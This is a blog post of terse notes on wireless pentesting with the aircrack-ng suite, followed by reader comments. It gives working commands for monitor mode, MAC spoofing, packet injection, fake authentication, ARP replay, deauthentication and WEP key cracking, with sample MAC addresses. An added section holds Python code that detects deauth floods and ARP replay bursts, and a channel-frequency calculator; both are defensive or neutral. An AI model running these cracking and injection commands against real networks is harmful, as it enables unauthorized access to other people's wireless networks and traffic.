--------------------------------------------------------------------
install madwifi-ng driver (done! monitor mode working)
install rt73 driver for dlink usb (done! monitor mode working)
install rtutilt for rausb0 configuration
install aircrack-ng (done dev version from svn)
Steps:
#####################################################
CONFIGURATION:
D-Link DWL-G122
ifconfig rausb0 up
iwpriv rausb0 forceprism 1
iwpriv rausb0 rfmontx 1
iwconfig rausb0 mode monitor OR
airmon-ng start rausb0 <channel>
NetGear WG511T
wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
specify channel:
iwconfig ath0 channel n
########################################################
CHANGING MAC ADDRESS
ifconfig ath0 down
ifconfig ath0 hw ether <new-mac>
ifconfig ath0 up
or use macchanger instead
#########################################################
INJECTION TESTING
NetGear WG511T
aireplay-ng -9
===================
D-Link DWL-G122
aireplay-ng -9 (if this doesn't work it means no AP on the same channel was found)
Try card-to-card injection below:
====================
Card-To-Card Injection:
Make sure both cards are on the same channel using:
iwlist
aireplay-ng -9 -i ath0 rausb0 (ath0 will mimic an access point)
aireplay-ng -9 -i rausb0 ath0 (rausb0 will mimic an access point)
=====================
########################################################
PACKET CAPTURE:
airodump-ng <device> (find out first the BSSID and channel of interest)
Then capture packets on that particular channel:
airodump-ng --channel <n> <device>
Notes: capture full packets when using PTW attack (don't dump ivs only)
MERGING capture files (RESUMING)
mergecap -w out.cap test1.cap test2.cap test3.cap
FOR IVS
use ivstools
############################################################
ATTACKS
You may want to associate to the AP first using fakeauth before any test:
aireplay-ng --fakeauth=0 -e SSID -a 00:1a:6d:f8:40:d0
Automatic Association:
aireplay-ng -1 6000 -o 1 -q 10 -e SSID -a 00:1A:6D:F8:40:D0 -h 06:14:6C:4C:B9:7C ath0
ARP replay (for wep cracking PTW method):
if RXQ in the airodump window is > 90 then expect #/s = 200+ (watch #Data, each data frame carries an IV)
aireplay-ng --arpreplay -b <bssid>
Deauthentication (to capture WPA handshake, reveal hidden SSID)
Fake Authentication (to authenticate to AP in case needed before we can inject)
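Defender's view of the two attacks noted above, as an added example that is not part of the original notes: a deauthentication flood shows up in a monitor-mode capture as a burst of deauth frames from one source, and ARP replay shows up as hundreds of identical-length data frames per second from one client (the "#/s = 200+" noted above). The detector below buckets frame records into one-second windows and alerts on both. The frame records are constructed inline (not a real capture) in the shape a `tshark -T fields` export would give; the thresholds are assumptions to tune per network. 802.11w protected management frames are the standard mitigation for the deauth case.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Frame:
    ts: float        # seconds since capture start
    subtype: str     # "deauth", "data", "beacon", ...
    src: str         # transmitter MAC
    dst: str         # receiver MAC
    length: int      # frame length in bytes


# Assumed thresholds; tune to the observed baseline of your own network.
DEAUTH_THRESHOLD = 20     # deauth frames per window from one source
REPLAY_THRESHOLD = 100    # identical-length data frames per window from one source
WINDOW = 1.0              # window size in seconds


def detect(frames, window=WINDOW):
    """Return alerts as (kind, src, count, window_start) tuples.

    Frames do not need to be time-sorted; each is bucketed by window index.
    """
    deauth = defaultdict(int)   # (window, src) -> deauth count
    data = defaultdict(int)     # (window, src, length) -> data frame count
    for f in frames:
        win = int(f.ts // window)
        if f.subtype == "deauth":
            deauth[(win, f.src)] += 1
        elif f.subtype == "data":
            data[(win, f.src, f.length)] += 1

    alerts = []
    for (win, src), n in sorted(deauth.items()):
        if n >= DEAUTH_THRESHOLD:
            alerts.append(("deauth_flood", src, n, win * window))
    for (win, src, length), n in sorted(data.items()):
        # A replayed ARP request is re-sent unchanged, so every copy has the
        # same length; normal traffic varies in size.
        if n >= REPLAY_THRESHOLD:
            alerts.append(("arp_replay_burst", src, n, win * window))
    return alerts


def build_sample():
    """Constructed frame records (not a real capture) using the MACs from the notes."""
    ap = "00:1a:6d:f8:40:d0"
    client = "06:14:6c:4c:b9:7c"
    frames = []
    # Background over three seconds: a beacon every 100 ms and a small data
    # frame of varying size from the client.
    for i in range(30):
        frames.append(Frame(i * 0.1, "beacon", ap, "ff:ff:ff:ff:ff:ff", 250))
        frames.append(Frame(i * 0.1 + 0.05, "data", client, ap, 100 + (i % 7)))
    # Second 1: 40 deauth frames with the AP's address as source.
    for i in range(40):
        frames.append(Frame(1.0 + i * 0.02, "deauth", ap, client, 26))
    # Second 2: 150 identical 68-byte data frames from the client in 0.75 s.
    for i in range(150):
        frames.append(Frame(2.0 + i * 0.005, "data", client, ap, 68))
    return frames


if __name__ == "__main__":
    for kind, src, count, start in detect(build_sample()):
        print(f"{start:6.1f}s  {kind:17s}  src={src}  frames={count}")
```

Run it as-is to see the two alerts; to use it on a real capture, read the fields from `tshark -r cap.pcap -T fields -e frame.time_relative -e wlan.fc.type_subtype -e wlan.sa -e wlan.da -e frame.len` and map subtype 0x0c to "deauth" and type 2 to "data".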
#############################################################
WEP CRACKING
Using the PTW attack (version 0.9+ only); packets must be ARP (from arp-replay):
aircrack-ng -z -b <bssid> capturefile
40-bit = 20,000
104-bit = 40,000
Normal Attack
-n 64 (test if 40-bit WEP); remove -n for 104-bit (default)
aircrack-ng -n 64 -a 1 capturefile
#########################################################
RESOLVE MAC Address to IP Address
use netdiscover or ARP tools
##########################################################
Determine the frequency on a particular channel
http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels then select "Wifi Channel Selection and Channel Overlap" tab.
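The channel-to-frequency calculation behind that page, as an added example (not from the original notes or the linked site): 2.4 GHz channels 1 to 13 are spaced 5 MHz apart starting at 2412 MHz, channel 14 sits at 2484 MHz, and two channels overlap when their centre frequencies are closer than the channel width (22 MHz for 802.11b DSSS, which is the conservative figure used as the default here). Useful for the card-to-card injection test above, which needs both cards on the same channel, and for seeing why only 1, 6 and 11 are mutually non-overlapping.

```python
def channel_frequency_mhz(channel):
    """Centre frequency of an IEEE 802.11 2.4 GHz channel in MHz."""
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    if channel == 14:
        return 2484          # Japan-only channel, off the 5 MHz grid
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def channels_overlap(a, b, width_mhz=22):
    """True if the two channels' occupied bands overlap.

    width_mhz defaults to 22 (802.11b DSSS); pass 20 for 802.11g/n OFDM.
    """
    return abs(channel_frequency_mhz(a) - channel_frequency_mhz(b)) < width_mhz


def overlapping_channels(channel, width_mhz=22):
    """All other 2.4 GHz channels whose band overlaps the given one."""
    return [c for c in range(1, 15)
            if c != channel and channels_overlap(channel, c, width_mhz)]


if __name__ == "__main__":
    for c in (1, 6, 11):
        print(f"channel {c:2d}: {channel_frequency_mhz(c)} MHz, "
              f"overlaps {overlapping_channels(c)}")
```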
#######################################################
Increasing injection speed
iwconfig <device> rate 11M
#####################################################
---------------------------------------------------------------------------
The Hacka Man
9 comments:
Have you personally try those commands in pentesting? YES or NO?
Are you using 'aircrack-ng suit' in MS Windows or Linux? or VM in windows? or Live-CD/USB?
Have you tried Auditor/Backtrack/Backtrack2/CoWAPPty with success wireless pentesting??
Do you agree any 'Certified IT' programme will not accept 'typo error' especially in 'Command'?
I'm just curious and all this brings me to what tools you used in your earlier post regarding gaining access to a router, and how you did it too?
Are you using CommView for WiFi/Cain & Abel/Wireshark?
Hi there.. mark here. thanks for acknowledging me dude. Here's my response to the previous post. The commands I have noted are not step by step walkthrough on wireless pentesting. I got everything working on my
here's the link to my blog.. http://matat0.blogspot.com
hi, thanks. I tried and rt73 is a very good chipset, supports injection. I can get the key in around 3 minutes with windows+vmware. Just find the tutorial here: Tutorial Cracking WEP In 3 Minute
When you "copy paste" a cracking tutorial, for your own sake please at least try it first. The guy before already pointed about your error in command typo, yet you still didn't find it? what a great certified hacker.